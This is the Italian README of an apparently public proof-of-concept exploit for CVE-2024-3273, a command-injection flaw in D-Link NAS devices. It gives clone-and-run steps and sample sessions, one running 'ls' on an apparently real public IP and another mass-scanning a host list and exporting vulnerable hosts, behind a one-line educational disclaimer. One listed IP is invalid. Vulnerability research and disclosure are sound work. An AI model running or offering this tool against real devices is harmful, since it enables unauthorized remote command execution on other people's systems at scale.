
Exploit per CVE-2024-3273, supporta host singoli e multipli
Questo repository contiene una Prova di Concetto (PoC) per CVE-2024-3273, una vulnerabilità di sicurezza scoperta nei dispositivi D-Link NAS. La vulnerabilità consente agli attaccanti di eseguire comandi arbitrari sui dispositivi vulnerabili.
CVE-2024-3273 è una vulnerabilità nei dispositivi D-Link NAS che consente a un attaccante remoto di eseguire comandi arbitrari tramite una richiesta HTTP manipolata all'endpoint cgi-bin/nas_sharing.cgi.
Questa PoC dimostra come la vulnerabilità possa essere sfruttata per eseguire comandi sui dispositivi D-Link NAS vulnerabili.
requestsClona questo repository:
git clone https://github.com/adhikara13/CVE-2024-3273.git
Naviga nella directory del repository:
cd CVE-2024-3273
Esegui la PoC:
python main.py
Segui le istruzioni a schermo per scegliere il dispositivo target:
host:port, e scegli se esportare gli host vulnerabili in vulnerables.txt.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Questa PoC è solo a scopo educativo e di ricerca. Usala responsabilmente e solo su dispositivi che sei autorizzato a testare.
I contributi sono benvenuti! Se trovi problemi o miglioramenti, sentiti libero di aprire un issue o creare una pull request.